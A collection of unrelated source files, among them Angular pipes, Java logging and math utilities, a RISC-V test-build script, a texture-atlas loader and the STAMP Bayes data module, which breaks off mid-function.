<gh_stars>0 import { Pipe, PipeTransform } from '@angular/core'; import { ScheduleEngineStepShared, ScheduleFlowStepShared, ScheduleGlobalAction, ScheduleGlobalStepShared, } from '@rg-share'; @Pipe({ name: 'isScheduleFlowStep' }) export class IsScheduleFlowStepPipe implements PipeTransform { transform(value: any): value is ScheduleFlowStepShared { return value instanceof ScheduleFlowStepShared; } } @Pipe({ name: 'isScheduleEngineStep' }) export class IsScheduleEngineStepPipe implements PipeTransform { transform(value: any): value is ScheduleEngineStepShared<any> { return value instanceof ScheduleEngineStepShared; } } @Pipe({ name: 'isScheduleGlobalStep' }) export class IsScheduleGlobalStepPipe implements PipeTransform { transform(value: any): value is ScheduleGlobalStepShared { return value instanceof ScheduleGlobalStepShared; } } @Pipe({ name: 'isScheduleFlowLoopStep' }) export class IsScheduleFlowLoopStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'loop'; } } @Pipe({ name: 'isScheduleFlowIfStep' }) export class IsScheduleFlowIfStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'if'; } } @Pipe({ name: 'isScheduleFlowSwitchStep' }) export class IsScheduleFlowSwitchStepPipe implements PipeTransform { transform(value: ScheduleFlowStepShared['action']): boolean { return value === 'switch'; } } @Pipe({ name: 'isScheduleGlobalInitEngineStep' }) export class IsScheduleGlobalInitEngineStepPipe implements PipeTransform { transform(value: ScheduleGlobalStepShared['action']): boolean { return value === ScheduleGlobalAction.initEngine } }
<gh_stars>0 /* * Copyright 2015 Cognitive Medical Systems, Inc (http://www.cognitivemedciine.com). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.socraticgrid.hl7.services.orders.logging; import java.util.HashMap; public class LogEntryMappings { private static HashMap<LogEntryType,LogEntryGroup> entryGroupMap; private static HashMap<LogEntryType,LogEntryLevels> entryLevelMap; static { entryGroupMap = new HashMap<LogEntryType,LogEntryGroup> (); entryGroupMap.put(LogEntryType.User_AuthenticationSuccess,LogEntryGroup.Authenication); entryGroupMap.put(LogEntryType.User_AuthenticationFailure,LogEntryGroup.Authenication); entryGroupMap.put(LogEntryType.User_ExceptionUsingService,LogEntryGroup.Exception); entryGroupMap.put(LogEntryType.User_CreateOrder,LogEntryGroup.Create); entryGroupMap.put(LogEntryType.User_CancelOrder,LogEntryGroup.Update); entryGroupMap.put(LogEntryType.User_ChangeOrder,LogEntryGroup.Update); entryGroupMap.put(LogEntryType.User_WorflowUpdate,LogEntryGroup.Workflow); entryGroupMap.put(LogEntryType.Fullfilment_Accepted,LogEntryGroup.Fullfilment); entryGroupMap.put(LogEntryType.Fullfilment_Rejected,LogEntryGroup.Fullfilment); entryGroupMap.put(LogEntryType.Fullfilment_Updated,LogEntryGroup.Fullfilment); entryGroupMap.put(LogEntryType.System_Startup,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_Shutdown,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_DirtyStartup,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_ServiceDown,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_ServiceUp,LogEntryGroup.Operational); entryGroupMap.put(LogEntryType.System_InternalError,LogEntryGroup.Exception); entryGroupMap.put(LogEntryType.General,LogEntryGroup.Diagnostic); entryGroupMap.put(LogEntryType.Diagnostic,LogEntryGroup.Diagnostic); entryGroupMap.put(LogEntryType.Trace,LogEntryGroup.Diagnostic); entryLevelMap = new HashMap<LogEntryType,LogEntryLevels> (); entryLevelMap.put(LogEntryType.User_AuthenticationSuccess,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.User_AuthenticationFailure,new LogEntryLevels(EventLevel.debug,EventLevel.warn)); entryLevelMap.put(LogEntryType.User_ExceptionUsingService,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_CreateOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_CancelOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_ChangeOrder,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.User_WorflowUpdate,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Fullfilment_Accepted,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.Fullfilment_Rejected,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Fullfilment_Updated,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_Startup,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_Shutdown,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.System_DirtyStartup,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_ServiceDown,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_ServiceUp,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.System_InternalError,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.General,new LogEntryLevels(EventLevel.debug,EventLevel.error)); entryLevelMap.put(LogEntryType.Diagnostic,new LogEntryLevels(EventLevel.debug,EventLevel.info)); entryLevelMap.put(LogEntryType.Trace,new LogEntryLevels(EventLevel.debug,EventLevel.info)); } static public LogEntryGroup getLogEntryGroup(LogEntryType entry) { return entryGroupMap.get(entry); } static public LogEntryLevels getLogEntryLevels(LogEntryType entry) { return entryLevelMap.get(entry); } }
<gh_stars>1-10 /* * Copyright (C) 2011 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.math; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.math.MathPreconditions.checkNonNegative; import static java.lang.Math.log; import com.google.common.annotations.GwtCompatible; import com.google.common.annotations.VisibleForTesting; import com.google.common.primitives.Booleans; /** * A class for arithmetic on doubles that is not covered by {@link java.lang.Math}. * * @author <NAME> * @since 11.0 */ @GwtCompatible(emulated = true) public final class DoubleMath { /* * This method returns a value y such that rounding y DOWN (towards zero) gives the same result * as rounding x according to the specified mode. */ private static final double MIN_INT_AS_DOUBLE = -0x1p31; private static final double MAX_INT_AS_DOUBLE = 0x1p31 - 1.0; private static final double MIN_LONG_AS_DOUBLE = -0x1p63; /* * We cannot store Long.MAX_VALUE as a double without losing precision. Instead, we store * Long.MAX_VALUE + 1 == -Long.MIN_VALUE, and then offset all comparisons by 1. */ private static final double MAX_LONG_AS_DOUBLE_PLUS_ONE = 0x1p63; /** * Returns the base 2 logarithm of a double value. * * <p>Special cases: * <ul> * <li>If {@code x} is NaN or less than zero, the result is NaN. * <li>If {@code x} is positive infinity, the result is positive infinity. * <li>If {@code x} is positive or negative zero, the result is negative infinity. * </ul> * * <p>The computed result is within 1 ulp of the exact result. * * <p>If the result of this method will be immediately rounded to an {@code int}, * {@link #log2(double, RoundingMode)} is faster. */ public static double log2(double x) { return log(x) / LN_2; // surprisingly within 1 ulp according to tests } private static final double LN_2 = log(2); /** * Returns {@code n!}, that is, the product of the first {@code n} positive * integers, {@code 1} if {@code n == 0}, or {@code n!}, or * {@link Double#POSITIVE_INFINITY} if {@code n! > Double.MAX_VALUE}. * * <p>The result is within 1 ulp of the true value. * * @throws IllegalArgumentException if {@code n < 0} */ public static double factorial(int n) { checkNonNegative("n", n); if (n > MAX_FACTORIAL) { return Double.POSITIVE_INFINITY; } else { // Multiplying the last (n & 0xf) values into their own accumulator gives a more accurate // result than multiplying by everySixteenthFactorial[n >> 4] directly. double accum = 1.0; for (int i = 1 + (n & ~0xf); i <= n; i++) { accum *= i; } return accum * everySixteenthFactorial[n >> 4]; } } @VisibleForTesting static final int MAX_FACTORIAL = 170; @VisibleForTesting static final double[] everySixteenthFactorial = { 0x1.0p0, 0x1.30777758p44, 0x1.956ad0aae33a4p117, 0x1.ee69a78d72cb6p202, 0x1.fe478ee34844ap295, 0x1.c619094edabffp394, 0x1.3638dd7bd6347p498, 0x1.7cac197cfe503p605, 0x1.1e5dfc140e1e5p716, 0x1.8ce85fadb707ep829, 0x1.95d5f3d928edep945}; /** * Returns {@code true} if {@code a} and {@code b} are within {@code tolerance} of each other. * * <p>Technically speaking, this is equivalent to * {@code Math.abs(a - b) <= tolerance || Double.valueOf(a).equals(Double.valueOf(b))}. * * <p>Notable special cases include: * <ul> * <li>All NaNs are fuzzily equal. * <li>If {@code a == b}, then {@code a} and {@code b} are always fuzzily equal. * <li>Positive and negative zero are always fuzzily equal. * <li>If {@code tolerance} is zero, and neither {@code a} nor {@code b} is NaN, then * {@code a} and {@code b} are fuzzily equal if and only if {@code a == b}. * <li>With {@link Double#POSITIVE_INFINITY} tolerance, all non-NaN values are fuzzily equal. * <li>With finite tolerance, {@code Double.POSITIVE_INFINITY} and {@code * Double.NEGATIVE_INFINITY} are fuzzily equal only to themselves. * </li> * * <p>This is reflexive and symmetric, but <em>not</em> transitive, so it is <em>not</em> an * equivalence relation and <em>not</em> suitable for use in {@link Object#equals} * implementations. * * @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN * @since 13.0 */ public static boolean fuzzyEquals(double a, double b, double tolerance) { MathPreconditions.checkNonNegative("tolerance", tolerance); return Math.copySign(a - b, 1.0) <= tolerance // copySign(x, 1.0) is a branch-free version of abs(x), but with different NaN semantics || (a == b) // needed to ensure that infinities equal themselves || (Double.isNaN(a) && Double.isNaN(b)); } /** * Compares {@code a} and {@code b} "fuzzily," with a tolerance for nearly-equal values. * * <p>This method is equivalent to * {@code fuzzyEquals(a, b, tolerance) ? 0 : Double.compare(a, b)}. In particular, like * {@link Double#compare(double, double)}, it treats all NaN values as equal and greater than all * other values (including {@link Double#POSITIVE_INFINITY}). * * <p>This is <em>not</em> a total ordering and is <em>not</em> suitable for use in * {@link Comparable#compareTo} implementations. In particular, it is not transitive. * * @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN * @since 13.0 */ public static int fuzzyCompare(double a, double b, double tolerance) { if (fuzzyEquals(a, b, tolerance)) { return 0; } else if (a < b) { return -1; } else if (a > b) { return 1; } else { return Booleans.compare(Double.isNaN(a), Double.isNaN(b)); } } /** * Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of * {@code values}. * * <p>If these values are a sample drawn from a population, this is also an unbiased estimator of * the arithmetic mean of the population. * * @param values a nonempty series of values * @throws IllegalArgumentException if {@code values} is empty */ public static double mean(int... values) { checkArgument(values.length > 0, "Cannot take mean of 0 values"); // The upper bound on the the length of an array and the bounds on the int values mean that, in // this case only, we can compute the sum as a long without risking overflow or loss of // precision. So we do that, as it's slightly quicker than the Knuth algorithm. long sum = 0; for (int index = 0; index < values.length; ++index) { sum += values[index]; } return (double) sum / values.length; } /** * Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of * {@code values}. * * <p>If these values are a sample drawn from a population, this is also an unbiased estimator of * the arithmetic mean of the population. * * @param values a nonempty series of values, which will be converted to {@code double} values * (this may cause loss of precision for longs of magnitude over 2^53 (slightly over 9e15)) * @throws IllegalArgumentException if {@code values} is empty */ public static double mean(long... values) { checkArgument(values.length > 0, "Cannot take mean of 0 values"); long count = 1; double mean = values[0]; for (int index = 1; index < values.length; ++index) { count++; // Art of Computer Programming vol. 2, Knuth, 4.2.2, (15) mean += (values[index] - mean) / count; } return mean; } private DoubleMath() {} }
/** * Represents an "enterprise" (e.g. an organisation, a department, etc). */ public final class Enterprise { private String name; Enterprise() { } /** * Creates a new enterprise with the specified name. * * @param name the name, as a String * @throws IllegalArgumentException if the name is not specified */ public Enterprise(String name) { if (name == null || name.trim().length() == 0) { throw new IllegalArgumentException("Name must be specified."); } this.name = name; } /** * Gets the name of this enterprise. * * @return the name, as a String */ public String getName() { return name; } }
<gh_stars>1-10 package gwl const ( eventButtonType = 0x00 ) type Event interface { Type() uint8 } type EventButton struct { Key Key Pressed bool Released bool } func (eb EventButton) Type() uint8 { return eventButtonType }
from typing import Dict, Text from rasa_nlu.config import RasaNLUModelConfig from rasa_nlu.train import do_train_in_worker class InplaceTraining(object): @classmethod def train(cls, config, data, project_dir_path, project=None, fixed_model_name=None, storage=None): # type: (Dict, Text, str, str, str, str) -> None cfg = RasaNLUModelConfig(config) do_train_in_worker( cfg, data, path=project_dir_path, project=project, fixed_model_name=fixed_model_name, storage=storage, component_builder=None ) inplace_train = InplaceTraining.train
<filename>ampoule/__init__.py<gh_stars>1-10 from .pool import deferToAMPProcess, pp from .commands import Shutdown, Ping, Echo from .child import AMPChild from ._version import __version__ as _my_version __version__ = _my_version.short() __all__ = [ 'deferToAMPProcess', 'pp', 'Shutdown', 'Ping', 'Echo', 'AMPChild', '__version__', ]
// NetworkPayload returns the payload of network layer, used for fragmentation. func (indicator *PacketIndicator) NetworkPayload() []byte { if indicator.NetworkLayer() == nil { return nil } return indicator.NetworkLayer().LayerPayload() }
import java.util.*; public class CoinRows { public static void main(String[] args) { Scanner sc=new Scanner(System.in); int t=sc.nextInt(); while(t-->0) { int m=sc.nextInt(); int arr[]=new int[m]; int brr[]=new int[m]; long presum[]=new long[m]; long sufsum[]=new long[m]; for(int i=0;i<m;i++) { arr[i]=sc.nextInt(); } brr[0]=sc.nextInt(); presum[0]=brr[0]; for(int i=1;i<m;i++) { brr[i]=sc.nextInt(); presum[i]=brr[i]+presum[i-1]; } // if(t==10000-41) { // System.out.println(m); // System.out.println(Arrays.toString(arr)); // System.out.println(Arrays.toString(brr)); // } if(m==1) { System.out.println(0); continue; } if(m==2) { System.out.println(Math.min(arr[m-1],brr[0])); continue; } sufsum[m-1]=arr[m-1]; for(int i=m-2;i>=0;i--) { sufsum[i]=arr[i]+sufsum[i+1]; } long ans=presum[m-2]; long now=0; for(int i=m-1,j=m-3;j>=0;i--,j--) { now=Math.max(presum[j],sufsum[i]); ans=Math.min(ans,now); //System.out.println(ans+" "+now); } ans=Math.min(ans,sufsum[1]); System.out.println(ans); // System.out.println(Arrays.toString(sufsum)); // System.out.println(Arrays.toString(presum)); } } }
// OnAfterRequest registers an event handler that fires after a request is processed by the controller func OnAfterRequest(callback func(client *Client, request *Request, response *Message)) { on("after-request", func(args ...interface{}) { if len(args) > 2 { callback(args[0].(*Client), args[1].(*Request), args[2].(*Message)) } }) }
def generate_ddocs(self, index_type): return { 'ddoc': { 'views': self.MAP_FUNCS[index_type] } }
def run_c(c_test, iss_yaml, isa, mabi, gcc_opts, iss_opts, output_dir, setting_dir, debug_cmd): if not c_test.endswith(".c"): logging.error("%s is not a .c file" % c_test) return cwd = os.path.dirname(os.path.realpath(__file__)) c_test = os.path.expanduser(c_test) report = ("%s/iss_regr.log" % output_dir).rstrip() c = re.sub(r"^.*\/", "", c_test) c = re.sub(r"\.c$", "", c) prefix = ("%s/directed_c_tests/%s" % (output_dir, c)) elf = prefix + ".o" binary = prefix + ".bin" iss_list = iss_opts.split(",") run_cmd("mkdir -p %s/directed_c_tests" % output_dir) logging.info("Compiling c test : %s" % c_test) cmd = ("%s -mcmodel=medany -nostdlib \ -nostartfiles %s \ -I%s/user_extension \ -T%s/scripts/link.ld %s -o %s " % \ (get_env_var("RISCV_GCC", debug_cmd = debug_cmd), c_test, cwd, cwd, gcc_opts, elf)) cmd += (" -march=%s" % isa) cmd += (" -mabi=%s" % mabi) run_cmd_output(cmd.split(), debug_cmd = debug_cmd) logging.info("Converting to %s" % binary) cmd = ("%s -O binary %s %s" % (get_env_var("RISCV_OBJCOPY", debug_cmd = debug_cmd), elf, binary)) run_cmd_output(cmd.split(), debug_cmd = debug_cmd) log_list = [] for iss in iss_list: run_cmd("mkdir -p %s/%s_sim" % (output_dir, iss)) log = ("%s/%s_sim/%s.log" % (output_dir, iss, c)) log_list.append(log) base_cmd = parse_iss_yaml(iss, iss_yaml, isa, setting_dir, debug_cmd) logging.info("[%0s] Running ISS simulation: %s" % (iss, elf)) cmd = get_iss_cmd(base_cmd, elf, log) run_cmd(cmd, 10, debug_cmd = debug_cmd) logging.info("[%0s] Running ISS simulation: %s ...done" % (iss, elf)) if len(iss_list) == 2: compare_iss_log(iss_list, log_list, report)
/** * The group link object links a host prototype with a host group and has the following properties. * <p/> * Created by Suguru Yajima on 2014/06/04. */ public class GroupLinkObject { /** * (readonly) ID of the group link. */ private Integer group_prototypeid; /** * ID of the host group. */ private Integer groupid; /** * (readonly) ID of the host prototype */ private Integer hostid; /** * (readonly) ID of the parent template group link. */ private Integer templateid; /** * Gets readonly ID of the parent template group link.. * * @return Value of readonly ID of the parent template group link.. */ public Integer getTemplateid() { return templateid; } /** * Sets new readonly ID of the parent template group link.. * * @param templateid New value of readonly ID of the parent template group link.. */ public void setTemplateid(Integer templateid) { this.templateid = templateid; } /** * Gets readonly ID of the host prototype. * * @return Value of readonly ID of the host prototype. */ public Integer getHostid() { return hostid; } /** * Sets new readonly ID of the host prototype. * * @param hostid New value of readonly ID of the host prototype. */ public void setHostid(Integer hostid) { this.hostid = hostid; } /** * Gets ID of the host group.. * * @return Value of ID of the host group.. */ public Integer getGroupid() { return groupid; } /** * Sets new ID of the host group.. * * @param groupid New value of ID of the host group.. */ public void setGroupid(Integer groupid) { this.groupid = groupid; } /** * Gets readonly ID of the group link.. * * @return Value of readonly ID of the group link.. */ public Integer getGroup_prototypeid() { return group_prototypeid; } /** * Sets new readonly ID of the group link.. * * @param group_prototypeid New value of readonly ID of the group link.. */ public void setGroup_prototypeid(Integer group_prototypeid) { this.group_prototypeid = group_prototypeid; } }
<reponame>kefik/Clear2D package cz.cuni.amis.clear2d.engine.textures; import java.io.IOException; import java.io.InputStream; import javax.imageio.ImageIO; import cz.cuni.amis.clear2d.engine.textures.TextureAtlasXML.SubtextureXML; public class TextureAtlasResource extends TextureAtlas { public TextureAtlasResource(InputStream atlasXMLInputStram, String atlasResourcePrefix) { super(); load(atlasXMLInputStram, atlasResourcePrefix); } private void load(InputStream atlasXMLInputStram, String atlasResourcePrefix) { if (atlasXMLInputStram == null) { throw new RuntimeException("atlasXMLInputStram == null, invalid"); } if (atlasResourcePrefix == null) { atlasResourcePrefix = "./"; } TextureAtlasXML atlas = TextureAtlasXML.loadXML(atlasXMLInputStram); // LOAD SHEET String resourcePath = atlasResourcePrefix + "/" + atlas.imagePath; try { setImage(ImageIO.read(getClass().getClassLoader().getResourceAsStream(resourcePath))); } catch (IOException e) { throw new RuntimeException("Failed to read resource: " + atlas.imagePath + " => " + resourcePath); } for (SubtextureXML subtextureXML : atlas.subtextures) { Subtexture subtexture = new Subtexture(subtextureXML.name, this, subtextureXML.x, subtextureXML.y, subtextureXML.x+subtextureXML.width, subtextureXML.y+subtextureXML.height); textures.put(subtexture.name, subtexture); } } }
/* ============================================================================= * * data.c * * ============================================================================= * * Copyright (C) Stanford University, 2006. All Rights Reserved. * Author: <NAME> * * ============================================================================= * * For the license of bayes/sort.h and bayes/sort.c, please see the header * of the files. * * ------------------------------------------------------------------------ * * For the license of kmeans, please see kmeans/LICENSE.kmeans * * ------------------------------------------------------------------------ * * For the license of ssca2, please see ssca2/COPYRIGHT * * ------------------------------------------------------------------------ * * For the license of lib/mt19937ar.c and lib/mt19937ar.h, please see the * header of the files. * * ------------------------------------------------------------------------ * * For the license of lib/rbtree.h and lib/rbtree.c, please see * lib/LEGALNOTICE.rbtree and lib/LICENSE.rbtree * * ------------------------------------------------------------------------ * * Unless otherwise noted, the following license applies to STAMP files: * * Copyright (c) 2007, Stanford University * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * * Neither the name of Stanford University nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY STANFORD UNIVERSITY ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL STANFORD UNIVERSITY BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. * * ============================================================================= */ #include <assert.h> #include <stdlib.h> #include <string.h> #include "bitmap.h" #include "data.h" #include "net.h" #include "random.h" #include "sort.h" #include "types.h" #include "vector.h" enum data_config { DATA_PRECISION = 100, DATA_INIT = 2 /* not 0 or 1 */ }; /* ============================================================================= * data_alloc * ============================================================================= */ data_t* data_alloc (long numVar, long numRecord, random_t* randomPtr) { data_t* dataPtr; dataPtr = (data_t*)malloc(sizeof(data_t)); if (dataPtr) { long numDatum = numVar * numRecord; dataPtr->records = (char*)malloc(numDatum * sizeof(char)); if (dataPtr->records == NULL) { free(dataPtr); return NULL; } memset(dataPtr->records, DATA_INIT, (numDatum * sizeof(char))); dataPtr->numVar = numVar; dataPtr->numRecord = numRecord; dataPtr->randomPtr = randomPtr; } return dataPtr; } /* ============================================================================= * data_free * ============================================================================= */ void data_free (data_t* dataPtr) { free(dataPtr->records); free(dataPtr); } /* ============================================================================= * data_generate * -- Binary variables of random PDFs * -- If seed is <0, do not reseed * -- Returns random network * ============================================================================= */ net_t* data_generate (data_t* dataPtr, long seed, long maxNumParent, long percentParent) { random_t* randomPtr = dataPtr->randomPtr; if (seed >= 0) { random_seed(randomPtr, seed); } /* * Generate random Bayesian network */ long numVar = dataPtr->numVar; net_t* netPtr = net_alloc(numVar); assert(netPtr); net_generateRandomEdges(netPtr, maxNumParent, percentParent, randomPtr); /* * Create a threshold for each of the possible permutation of variable * value instances */ long** thresholdsTable = (long**)malloc(numVar * sizeof(long*)); assert(thresholdsTable); long v; for (v = 0; v < numVar; v++) { list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, v); long numThreshold = 1 << list_getSize(parentIdListPtr); long* thresholds = (long*)malloc(numThreshold * sizeof(long)); assert(thresholds); long t; for (t = 0; t < numThreshold; t++) { long threshold = random_generate(randomPtr) % (DATA_PRECISION + 1); thresholds[t] = threshold; } thresholdsTable[v] = thresholds; } /* * Create variable dependency ordering for record generation */ long* order = (long*)malloc(numVar * sizeof(long)); assert(order); long numOrder = 0; queue_t* workQueuePtr = queue_alloc(-1); assert(workQueuePtr); vector_t* dependencyVectorPtr = vector_alloc(1); assert(dependencyVectorPtr); bitmap_t* orderedBitmapPtr = bitmap_alloc(numVar); assert(orderedBitmapPtr); bitmap_clearAll(orderedBitmapPtr); bitmap_t* doneBitmapPtr = bitmap_alloc(numVar); assert(doneBitmapPtr); bitmap_clearAll(doneBitmapPtr); v = -1; while ((v = bitmap_findClear(doneBitmapPtr, (v + 1))) >= 0) { list_t* childIdListPtr = net_getChildIdListPtr(netPtr, v); long numChild = list_getSize(childIdListPtr); if (numChild == 0) { bool_t status; /* * Use breadth-first search to find net connected to this leaf */ queue_clear(workQueuePtr); status = queue_push(workQueuePtr, (void*)v); assert(status); while (!queue_isEmpty(workQueuePtr)) { long id = (long)queue_pop(workQueuePtr); status = bitmap_set(doneBitmapPtr, id); assert(status); status = vector_pushBack(dependencyVectorPtr, (void*)id); assert(status); list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, id); list_iter_t it; list_iter_reset(&it, parentIdListPtr); while (list_iter_hasNext(&it, parentIdListPtr)) { long parentId = (long)list_iter_next(&it, parentIdListPtr); status = queue_push(workQueuePtr, (void*)parentId); assert(status); } } /* * Create ordering */ long i; long n = vector_getSize(dependencyVectorPtr); for (i = 0; i < n; i++) { long id = (long)vector_popBack(dependencyVectorPtr); if (!bitmap_isSet(orderedBitmapPtr, id)) { bitmap_set(orderedBitmapPtr, id); order[numOrder++] = id; } } } } assert(numOrder == numVar); /* * Create records */ char* record = dataPtr->records; long r; long numRecord = dataPtr->numRecord; for (r = 0; r < numRecord; r++) { long o; for (o = 0; o < numOrder; o++) { long v = order[o]; list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, v); long index = 0; list_iter_t it; list_iter_reset(&it, parentIdListPtr); while (list_iter_hasNext(&it, parentIdListPtr)) { long parentId = (long)list_iter_next(&it, parentIdListPtr); long value = record[parentId]; assert(value != DATA_INIT); index = (index << 1) + value; } long rnd = random_generate(randomPtr) % DATA_PRECISION; long threshold = thresholdsTable[v][index]; record[v] = ((rnd < threshold) ? 1 : 0); } record += numVar; assert(record <= (dataPtr->records + numRecord * numVar)); } /* * Clean up */ bitmap_free(doneBitmapPtr); bitmap_free(orderedBitmapPtr); vector_free(dependencyVectorPtr); queue_free(workQueuePtr); free(order); for (v = 0; v < numVar; v++) { free(thresholdsTable[v]); } free(thresholdsTable); return netPtr; } /* ============================================================================= * data_getRecord * -- Returns NULL if invalid index * ============================================================================= */ char* data_getRecord (data_t* dataPtr, long index) { if (index < 0 || index >= (dataPtr->numRecord)) { return NULL; } return &dataPtr->records[index * dataPtr->numVar]; } /* ============================================================================= * data_copy * -- Returns FALSE on failure * ============================================================================= */ bool_t data_copy (data_t* dstPtr, data_t* srcPtr) { long numDstDatum = dstPtr->numVar * dstPtr->numRecord; long numSrcDatum = srcPtr->numVar * srcPtr->numRecord; if (numDstDatum != numSrcDatum) { free(dstPtr->records); dstPtr->records = (char*)calloc(numSrcDatum, sizeof(char)); if (dstPtr->records == NULL) { return FALSE; } } dstPtr->numVar = srcPtr->numVar; dstPtr->numRecord = srcPtr->numRecord; memcpy(dstPtr->records, srcPtr->records, (numSrcDatum * sizeof(char))); return TRUE; } /* ============================================================================= * compareRecord * ============================================================================= */ static int compareRecord (const void* p1, const void* p2, long n, long offset) { long i = n - offset; const char* s1 = (const char*)p1 + offset; const char* s2 = (const char*)p2 + offset; while (i-- > 0) { unsigned char u1 = (unsigned char)*s1++; unsigned char u2 = (unsigned char)*s2++; if (u1 != u2) { return (u1 - u2); } } return 0; } /* ============================================================================= * data_sort * -- In place * ============================================================================= */ void data_sort (data_t* dataPtr, long start, long num, long offset) { assert(start >= 0 && start <= dataPtr->numRecord); assert(num >= 0 && num <= dataPtr->numRecord); assert(start + num >= 0 && start + num <= dataPtr->numRecord); long numVar = dataPtr->numVar; sort((dataPtr->records + (start * numVar)), num, numVar, &compareRecord, numVar, offset); } /* ============================================================================= * data_findSplit * -- Call data_sort first with proper start, num, offset * -- Returns number of zeros in offset column * ============================================================================= */ long data_findSplit (data_t* dataPtr, long start, long num, long offset) { long low = start; long high = start + num - 1; long numVar = dataPtr->numVar; char* records = dataPtr->records; while (low <= high) { long mid = (low + high) / 2; if (records[numVar * mid + offset] == 0) { low = mid + 1; } else { high = mid - 1; } } return (low - start); } /* ############################################################################# * TEST_DATA * ############################################################################# */ #ifdef TEST_DATA #include <stdio.h> #include <string.h> static void printRecords (data_t* dataPtr) { long numVar = dataPtr->numVar; long numRecord = dataPtr->numRecord; long r; for (r = 0; r < numRecord; r++) { printf("%4li: ", r); char* record = data_getRecord(dataPtr, r); assert(record); long v; for (v = 0; v < numVar; v++) { printf("%li", (long)record[v]); } puts(""); } puts(""); } static void testAll (long numVar, long numRecord, long numMaxParent, long percentParent) { random_t* randomPtr = random_alloc(); puts("Starting..."); data_t* dataPtr = data_alloc(numVar, numRecord, randomPtr); assert(dataPtr); puts("Init:"); net_t* netPtr = data_generate(dataPtr, 0, numMaxParent, percentParent); net_free(netPtr); printRecords(dataPtr); puts("Sort first half from 0:"); data_sort(dataPtr, 0, numRecord/2, 0); printRecords(dataPtr); puts("Sort second half from 0:"); data_sort(dataPtr, numRecord/2, numRecord-numRecord/2, 0); printRecords(dataPtr); puts("Sort all from mid:"); data_sort(dataPtr, 0, numRecord, numVar/2); printRecords(dataPtr); long split = data_findSplit(dataPtr, 0, numRecord, numVar/2); printf("Split = %li\n", split); long v; for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } } memset(dataPtr->records, 0, dataPtr->numVar * dataPtr->numRecord); for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { 